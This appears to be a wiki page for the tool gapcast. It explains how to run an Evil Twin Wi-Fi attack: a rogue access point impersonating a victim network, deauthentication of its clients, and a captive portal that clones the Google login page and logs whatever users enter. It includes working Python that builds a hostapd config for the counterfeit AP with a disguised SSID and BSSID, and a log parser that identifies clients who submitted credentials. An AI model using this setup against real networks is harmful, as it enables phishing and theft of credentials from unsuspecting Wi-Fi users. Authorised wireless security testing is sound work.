
Evil Twin

Andrea Vaccaro edited this page Jul 26, 2024 · 8 revisions

🌐Evil-Twin with Captive Portal

Evil Twin Example

This manual walks you through configuring and running an Evil Twin attack with a captive portal. The attack impersonates a legitimate Wi-Fi access point so that users connect to the rogue AP instead, where the captive portal is served to them.


Aside from the 📚dependencies, the most important requirement is the NIC (Network Interface Card):

  • The first NIC, selected at gapcast startup with the -i <iface> parameter, runs the rogue AP.

  • The secondary NIC, selected when the attack starts, is used to send deauthentication frames against the victim AP so that its clients drop and reconnect (optional but highly recommended).


⚠️Both NICs must support monitor mode; check this before starting, because the attack will fail at the deauthentication step otherwise.
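A quick way to verify the monitor-mode requirement before launching gapcast, as an added example that is not part of gapcast itself: it parses the "Supported interface modes" block printed by `iw phy <phy> info` and, for live use, maps a netdev name to its PHY through sysfs and runs `iw`. The `iw` output embedded below is a constructed, abridged sample so the check can be exercised offline.

```python
"""Check that a wireless PHY advertises monitor mode before using it with gapcast.

Added example, not gapcast code. Works on the text of `iw phy <phy> info`;
the sample outputs below are constructed and abridged.
"""
import re
import subprocess
import sys

# Constructed sample of `iw phy phy0 info` (abridged): a NIC that supports monitor mode.
SAMPLE_IW_PHY_INFO = """\
Wiphy phy0
    max # scan SSIDs: 4
    Supported interface modes:
         * IBSS
         * managed
         * AP
         * AP/VLAN
         * monitor
         * P2P-client
    Band 1:
        Capabilities: 0x1862
"""

# Constructed sample of a NIC that cannot enter monitor mode.
SAMPLE_NO_MONITOR = """\
Wiphy phy1
    Supported interface modes:
         * managed
         * P2P-client
"""


def supported_modes(iw_phy_info: str) -> set:
    """Return the interface modes listed under 'Supported interface modes:'."""
    modes = set()
    in_block = False
    for line in iw_phy_info.splitlines():
        stripped = line.strip()
        if stripped.startswith("Supported interface modes:"):
            in_block = True
            continue
        if in_block:
            m = re.match(r"\*\s+(\S.*)$", stripped)
            if m:
                modes.add(m.group(1).strip())
            else:
                break  # first non-bullet line ends the block
    return modes


def supports_monitor(iw_phy_info: str) -> bool:
    """True if 'monitor' is among the advertised interface modes."""
    return "monitor" in supported_modes(iw_phy_info)


def phy_for_interface(iface: str) -> str:
    """Map a netdev name such as wlan0 to its PHY name (phy0) via sysfs."""
    with open(f"/sys/class/net/{iface}/phy80211/name") as f:
        return f.read().strip()


def check_interface(iface: str) -> bool:
    """Live check: run `iw phy <phy> info` for the interface and inspect its modes."""
    phy = phy_for_interface(iface)
    out = subprocess.run(["iw", "phy", phy, "info"],
                         capture_output=True, text=True, check=True).stdout
    return supports_monitor(out)


if __name__ == "__main__":
    # Usage: python check_monitor.py wlan0 wlan1  (one argument per NIC you plan to use)
    for iface in sys.argv[1:]:
        print(f"{iface}: monitor mode {'supported' if check_interface(iface) else 'NOT supported'}")
```

Run it once for the AP NIC and once for the deauthentication NIC; a PHY that lists `AP` but not `monitor` is fine for hosting the rogue AP but cannot be used as the secondary NIC.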


🚀How to start Evil-Twin environment

  1. Open the INJ Table.
  2. Select the third attack option, Evil-Twin.
  3. An input bar appears: enter the victim AP (its BSSID).

🔧Alternatively, skip step 3 by passing the -b <BSSID> parameter to specify the victim BSSID directly.

🗞Setup steps

➡️The first step is selecting the web template for the captive portal. In version 1.0.3 two templates are available:

  • GoogleLogIn: a clone of the Google login page.
  • CustomVideo: automatically opens a video in full screen.

For login-page templates, whatever the user submits in the form is recorded in the Gapcast log.

📝If these templates do not meet your requirements, you can create a template from scratch by following this guide.

➡️The second step is NIC selection: the secondary NIC you choose here is used for deauthentication. The NIC already in use for running the AP is excluded from the list. If no second NIC is present, or you do not need deauthentication, simply select nothing.

📜Logs

🔍[LOG] log: the preliminary commands run before the Evil Twin starts and the ones run at termination.

🔍[AP-INFO] log:

  • Provides details of the counterfeit access point (AP):
    • Name (SSID), prefixed with a blank character so that it is distinct from the real AP's SSID and avoids substitution issues
    • MAC address (BSSID), with the last octet modified so that it differs from the real AP's
    • Transmission channel
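The following is an added example, not gapcast's own code, showing how the counterfeit AP parameters listed in [AP-INFO] can be derived and turned into a hostapd configuration. gapcast does not document which value it writes into the last octet, so flipping its low bit (XOR 0x01) is an assumption made here; the SSID is emitted with hostapd's `ssid2=P"..."` syntax so the leading blank survives config parsing, and the 32-byte SSID limit is enforced.

```python
"""Derive the counterfeit AP's SSID/BSSID as the [AP-INFO] log describes and emit a hostapd config.

Added example, not gapcast code. The "flip the low bit of the last octet" rule
is an assumption; gapcast only states that the last octet is modified.
"""
import re

MAC_RE = re.compile(r"^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")
MAX_SSID_BYTES = 32  # 802.11 SSID element limit


def twin_ssid(victim_ssid: str) -> str:
    """Prefix a blank so the rogue SSID differs from the victim's at byte level.

    Raises ValueError if the result would exceed the 32-byte SSID limit.
    """
    ssid = " " + victim_ssid
    if len(ssid.encode("utf-8")) > MAX_SSID_BYTES:
        raise ValueError("prefixed SSID exceeds 32 bytes; the victim SSID is too long")
    return ssid


def twin_bssid(victim_bssid: str) -> str:
    """Modify the last octet of the victim BSSID (assumed rule: flip the low bit)."""
    if not MAC_RE.match(victim_bssid):
        raise ValueError(f"not a MAC address: {victim_bssid!r}")
    octets = [int(o, 16) for o in victim_bssid.split(":")]
    octets[5] ^= 0x01
    return ":".join(f"{o:02x}" for o in octets)


def _printf_escape(s: str) -> str:
    """Encode for hostapd's ssid2=P"..." syntax so the leading blank is kept verbatim."""
    out = []
    for b in s.encode("utf-8"):
        if 0x21 <= b <= 0x7E and b not in (0x22, 0x5C):  # printable, not '"' or '\'
            out.append(chr(b))
        else:
            out.append(f"\\x{b:02x}")
    return "".join(out)


def hostapd_conf(iface: str, victim_ssid: str, victim_bssid: str, channel: int) -> str:
    """Minimal open-network hostapd.conf for the counterfeit AP."""
    hw_mode = "g" if channel <= 14 else "a"  # 2.4 GHz channels are 1-14
    return "\n".join([
        f"interface={iface}",
        "driver=nl80211",
        f'ssid2=P"{_printf_escape(twin_ssid(victim_ssid))}"',
        f"bssid={twin_bssid(victim_bssid)}",
        f"hw_mode={hw_mode}",
        f"channel={channel}",
        "auth_algs=1",
        "ignore_broadcast_ssid=0",
    ]) + "\n"


if __name__ == "__main__":
    # Constructed victim parameters; the BSSID is not a real device.
    print(hostapd_conf("wlan0", "CoffeeShop", "aa:bb:cc:dd:ee:0f", 6))
```

The channel must match the one reported in [AP-INFO]: a twin on a different channel still works for clients that scan, but the deauthentication on the secondary NIC is what pushes them over, and they reassociate fastest to a same-channel network with a known name.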

🔍[HOSTAPD-LOG] log: messages from hostapd, the access-point daemon.

🔍[INJ-LOG] log:

  • Logs related to frame injection, detailing:
    • Start of deauthentication
    • Any errors during deauthentication
    • End of deauthentication

🔍[INFO-GRABBED] log:

  • Interpretation of the Apache2 access log (connections, GET/POST requests and the form ACTION they target)
  • Information grabbed from user inputs
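The kind of interpretation [INFO-GRABBED] performs on the Apache2 access log, as an added example that is not gapcast's code: it parses combined-format lines, recognises the URLs operating systems fetch to detect a captive portal (Android `/generate_204`, Apple `/hotspot-detect.html`, Windows `/connecttest.txt`), and reports which clients POSTed to the login form's action. The action path `/login.php` and the log lines are constructed for the example; the real template's form action may differ. Note that submitted form values never appear in the access log, which only records the request line; they come from the portal's own handler.

```python
"""Interpret Apache2 access-log lines as the [INFO-GRABBED] log does: who connected,
which OS captive-portal probes hit the portal, and which clients POSTed to the login action.

Added example, not gapcast code. The action path and the sample lines are constructed.
"""
import re
from collections import defaultdict
from typing import Optional

# Apache "combined" log format; "common" format lines (no referer/UA) also match.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?$'
)

# URLs operating systems request to detect a captive portal (Android, Apple, Windows).
PROBE_PATHS = {"/generate_204", "/gen_204", "/hotspot-detect.html", "/connecttest.txt", "/ncsi.txt"}

# Constructed sample log; not real traffic. The last line is deliberately malformed.
SAMPLE_LOG = """\
192.168.4.12 - - [26/Jul/2024:14:02:11 +0200] "GET /generate_204 HTTP/1.1" 302 0 "-" "Dalvik/2.1.0 (Linux; U; Android 13)"
192.168.4.12 - - [26/Jul/2024:14:02:12 +0200] "GET /index.html HTTP/1.1" 200 5120 "-" "Dalvik/2.1.0 (Linux; U; Android 13)"
192.168.4.12 - - [26/Jul/2024:14:02:40 +0200] "POST /login.php HTTP/1.1" 302 0 "http://10.0.0.1/index.html" "Mozilla/5.0 (Linux; Android 13)"
192.168.4.25 - - [26/Jul/2024:14:03:01 +0200] "GET /hotspot-detect.html HTTP/1.1" 302 0 "-" "CaptiveNetworkSupport-390 wispr"
this line is not an access-log entry
"""


def parse_line(line: str) -> Optional[dict]:
    """Parse one access-log line into a dict, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    # Drop any query string so /login.php?x=1 still matches the action path.
    entry["path"] = entry["path"].split("?", 1)[0]
    return entry


def classify(entry: dict, action_path: str) -> str:
    """Categorise a request: OS probe, page fetch, login POST, or other."""
    if entry["path"] in PROBE_PATHS:
        return "probe"
    if entry["method"] == "POST" and entry["path"] == action_path:
        return "login-post"
    if entry["method"] == "GET":
        return "page"
    return "other"


def summarize(lines, action_path: str = "/login.php"):
    """Per-client counts by category, plus the number of lines that did not parse."""
    clients = defaultdict(lambda: {"probe": 0, "page": 0, "login-post": 0, "other": 0})
    unparsed = 0
    for line in lines:
        if not line.strip():
            continue
        entry = parse_line(line)
        if entry is None:
            unparsed += 1
            continue
        clients[entry["ip"]][classify(entry, action_path)] += 1
    return dict(clients), unparsed


def credential_posters(lines, action_path: str = "/login.php"):
    """IPs that submitted the login form. The submitted values are not in the access
    log; they are recorded by the portal's handler and reported under [INFO-GRABBED]."""
    clients, _ = summarize(lines, action_path)
    return sorted(ip for ip, counts in clients.items() if counts["login-post"] > 0)


if __name__ == "__main__":
    per_client, bad = summarize(SAMPLE_LOG.splitlines())
    for ip, counts in per_client.items():
        print(ip, counts)
    print("unparsed lines:", bad)
    print("clients that POSTed credentials:", credential_posters(SAMPLE_LOG.splitlines()))
```

A client that shows a probe followed by a page fetch but no login POST has seen the portal and walked away; that pattern is also what a defender reviewing the same log would use to spot a rogue portal in the first place.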

How to create custom web model

Documentation coming soon🚀
